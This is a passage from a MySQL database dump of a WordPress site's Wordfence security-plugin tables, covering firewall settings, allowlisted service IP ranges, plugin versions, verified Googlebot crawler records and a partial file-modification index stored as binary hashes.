d3c3a6cf\";}}','yes'),('vulnerabilities_theme','a:1:{i:0;a:4:{s:4:\"slug\";s:6:\"hitmag\";s:9:\"toVersion\";s:5:\"1.3.4\";s:11:\"fromVersion\";s:5:\"1.3.2\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertLastSendTime','1670720473','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('wafStatusCallbackNonce','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','33554432','no'),('wfScanStartVersion','6.1.1','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1675160550;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:10:{s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"4.4.11\";s:17:\"disable-gutenberg\";s:3:\"2.6\";s:5:\"hello\";s:5:\"1.7.2\";s:26:\"insert-headers-and-footers\";s:5:\"1.6.0\";s:11:\"redirection\";s:5:\"5.2.3\";s:10:\"wp-smushit\";s:5:\"3.9.5\";s:9:\"wordfence\";s:5:\"7.5.9\";s:9:\"wp-cerber\";s:5:\"8.9.6\";s:16:\"wp-fastest-cache\";s:5:\"1.0.0\";s:13:\"wordpress-seo\";s:6:\"18.5.1\";}','yes'),('wordpressThemeVersions','a:2:{s:6:\"hitmag\";s:5:\"1.3.2\";s:17:\"twentytwentythree\";s:3:\"1.0\";}','yes'),('wordpressVersion','6.1.1','yes'),('wp_home_url','https://www.dailyjolly.co.uk','yes'),('wp_site_url','https://www.dailyjolly.co.uk','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfcrawlers`
--

DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfcrawlers`
--

LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�A{','�����>�b0�oQ1��','verified',1674703927,'crawl-66-249-65-123.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A}','�����>�b0�oQ1��','verified',1674742614,'crawl-66-249-65-125.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A','�����>�b0�oQ1��','verified',1674721122,'crawl-66-249-65-127.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1675096662,'crawl-66-249-66-15.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BA','�����>�b0�oQ1��','verified',1675083673,'crawl-66-249-66-65.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1675111573,'crawl-66-249-66-204.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�F�','�����>�b0�oQ1��','verified',1674603214,'crawl-66-249-70-129.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I6','�����>�b0�oQ1��','verified',1674687998,'crawl-66-249-73-54.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�If','�����>�b0�oQ1��','verified',1674941843,'crawl-66-249-73-102.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Il','�����>�b0�oQ1��','verified',1674772610,'crawl-66-249-73-108.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J[','�����>�b0�oQ1��','verified',1674645938,'crawl-66-249-74-91.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J]','�����>�b0�oQ1��','verified',1674661432,'crawl-66-249-74-93.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J_','�����>�b0�oQ1��','verified',1674652531,'crawl-66-249-74-95.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K�','�����>�b0�oQ1��','verified',1675197481,'crawl-66-249-75-229.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K�','�����>�b0�oQ1��','verified',1675209031,'crawl-66-249-75-250.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K�','�����>�b0�oQ1��','verified',1675181268,'crawl-66-249-75-252.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L3','�����>�b0�oQ1��','verified',1674822756,'crawl-66-249-76-51.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L5','�����>�b0�oQ1��','verified',1674863395,'crawl-66-249-76-53.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L7','�����>�b0�oQ1��','verified',1674888501,'crawl-66-249-76-55.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��J}��','�����>�b0�oQ1��','verified',1674895226,'rate-limited-proxy-74-125-151-246.google.com'),('\0\0\0\0\0\0\0\0\0\0���U�?','�����>�b0�oQ1��','verified',1675065757,'rate-limited-proxy-209-85-238-63.google.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilechanges`
--

DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilechanges`
--

LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilemods`
--

DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilemods`
--

LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0gR/$e�l�uX�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y���\r��b�E�','�\"8�sǔ�pһ\n��k�V���r(ʙ���U','',0,'?'),('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\0-,ިe>��j���S�','wp-content/plugins/wp-smushit/core/integrations/nextgen/class-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',K��J����#ѧuN','PQ�\\6\n��*��.����dP�.�\Z�]����.','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\02�?&�F�6ʊ91bY','wp-content/plugins/wp-smushit/_src/scss/app.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>d��f�^Q.Ɵp','�o$�HF#��J	礽ѣ��3�Q���','',0,'?'),('\05g���꫔c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�=:��/Ѣxs','u��社�.��p[�6�z�L���{dXY�Pwx','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�((�+t��I��z�','������ݤ�,De�	tw|��tkJ���','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0G�S���3j�k','wp-includes/wp-includes/css/customize-preview.css',0,'1ig`��o���ӏٷ1>','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('\0RȞ6� ��-����','wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php',0,'p��Ʈ�u��o7;~z','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('\0[��xFLpǍ��)+�','wp-includes/wp-includes/images/media/archive.png',0,'9����h�\0��ì�u','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('\0\\s�TÐ��֘8��','wp-includes/blocks/post-excerpt/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӣ�����6��','L(�Ƅ�}�\03��t9v~<�{��~���y1','',0,'?'),('\0_�]��wgGS�K��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~rD�5�y�E��:','��蛮����!Z|��L���x<A6�&��','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0a\0=꼏뺏��{�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/el.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��l�MX��1��/','���PF�!�K2�O	$>���p��5.E�','',0,'?'),('\0i��bi�6\Z��ɽܮ','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php',0,'�����G���o�\n�>','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('\0��2��� 